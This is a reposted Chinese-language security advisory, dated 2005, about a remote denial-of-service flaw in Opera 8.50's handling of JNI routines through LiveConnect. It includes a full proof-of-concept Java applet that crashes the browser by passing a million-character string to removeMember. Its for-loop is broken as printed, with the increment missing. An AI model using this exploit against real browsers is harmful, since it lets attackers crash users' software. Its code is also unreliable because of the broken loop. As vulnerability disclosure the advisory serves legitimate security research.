Opera Web浏览器JNI例程处理远程拒绝服务漏洞

发布日期：2005-11-30
更新日期：2005-12-01

受影响系统：

Opera Software Opera 8.50

不受影响系统：

Opera Software Opera 8.51

描述：

---

BUGTRAQ ID: 15648

Opera是一款流行的WEB浏览器，支持多种平台。

Opera在处理JNI例程时存在漏洞，远程攻击者可能利用此漏洞对浏览器造成拒绝服务攻击。

使用LiveConnect方式删除JavaScript对象属性的Java代码在某些情况下可能使用空指针。如果用户受骗处理了包含有JNI例程的Java applet的话，就会导致浏览器崩溃。

<*来源：Marc Schoenefeld （marc.schoenefeld@uni-muenster.de）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113339026223293&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

import java.applet.Applet;
import java.awt.Graphics;

import netscape.javascript.JSObject;

public class OperaTest extends Applet{
static {
System.out.println("Loaded 1.2");
}
public void paint(Graphics g) {
System.out.println("start");
try {
netscape.javascript.JSObject jso = JSObject.getWindow(this);
System.out.println(jso.getClass());
com.opera.JSObject j = (com.opera.JSObject ) jso;
char[] x = new char[1000000];
for (int y = 0 ; y < x.length; y ) {
x [y] = 'A';
}
String z = new String(x);
System.out.println("after evalb");
j.removeMember(z);
System.out.println("after remove");
}
catch (Exception e) {
e.printStackTrace();
}
}
}

建议：

---

厂商补丁：

Opera Software
--------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.opera.com

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有